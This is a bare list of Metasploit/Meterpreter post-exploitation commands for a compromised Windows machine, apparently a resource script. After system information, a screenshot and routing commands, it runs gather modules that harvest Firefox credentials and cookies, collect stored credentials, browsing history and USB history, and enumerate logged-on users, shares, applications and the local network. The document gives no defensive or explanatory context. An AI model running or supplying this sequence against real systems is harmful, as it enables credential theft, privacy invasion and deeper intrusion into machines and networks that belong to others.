sysinfo
show_mount
route
screenshot -v -p gather.jpeg -v true
run post/multi/gather/env
run post/multi/gather/firefox_creds
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_applications
run post/windows/gather/enum_prefetch
run post/windows/gather/enum_ie
run post/windows/gather/enum_shares
run post/windows/gather/dumplinks
run post/windows/gather/enum_snmp
run post/windows/gather/arp_scanner
run post/windows/gather/usb_history
run post/windows/gather/credential_collector
run post/firefox/gather/cookies
run post/firefox/gather/history

